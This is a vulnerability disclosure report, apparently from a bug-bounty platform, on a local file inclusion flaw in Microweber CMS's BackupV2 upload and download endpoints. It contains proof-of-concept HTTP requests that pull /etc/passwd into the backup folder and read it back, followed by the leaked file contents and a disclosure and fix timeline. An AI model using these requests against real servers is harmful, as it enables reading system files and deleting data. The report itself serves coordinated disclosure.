External Control of File Name or Path in microweber/microweber

Valid

Reported on

Jan 29th 2022


Description

In the Microweber CMS, there are two endpoints that can be used together to get local file inclusion vulnerability.

  1. /api/BackupV2/upload?src=/etc/passwd
  2. /api/BackupV2/download?file=passwd

When logged in as administrator, we can upload any readable file from the operating system into the backups folder. The backup files are located in /var/www/microweber/storage/backup_content/.

Proof of Concept

  1. Upload /etc/passwd file into the backups folder.
GET /api/BackupV2/upload?src=/etc/passwd HTTP/1.1
Host: 192.168.188.132
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --
  1. Read the file from the backups folder.
GET /api/BackupV2/download?file=passwd HTTP/1.1
Host: 192.168.188.132
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
-- snippet --

Impact

This vulnerability is capable of local file inclusion and can be used to gain access to the server when combined with vulnerability chaining. Additionally original files are deleted after uploading, as a result of that files can be lost. So deleting any file in the webroot can cause web application to not respond to HTTP requests.

We are processing your report and will contact the microweber team within 24 hours. 4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
Talha Karakumru modified the report
4 months ago
We have contacted a member of the microweber team and are waiting to hear back 4 months ago
We have sent a follow up to the microweber team. We will try again in 7 days. 4 months ago
Talha Karakumru
4 months ago

Researcher


@maintainer @admin any update?

Jamie Slome
4 months ago

Admin


Our automated notification system will continue to reach out to the maintainers. Please get in touch with us once the report has gone stale, and we will manually reach out to the maintainers on your behalf ♥️

Peter Ivanov validated this vulnerability 4 months ago
Talha Karakumru has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov
4 months ago

Maintainer


Hello this issue has been fixed , thanks for the report

Peter Ivanov confirmed that a fix has been merged on 957d30 4 months ago
Peter Ivanov has been awarded the fix bounty
Talha Karakumru
4 months ago

Researcher


@maintainer Hello Peter, the commit does not seem to be the solution.

Talha Karakumru
4 months ago

Researcher


https://github.com/microweber/microweber/commit/98d025467128ecc24195dcb56c533febc3c91af6

https://github.com/microweber/microweber/commit/572bdc36b5b47923790016f6b961c8df53226855

to join this conversation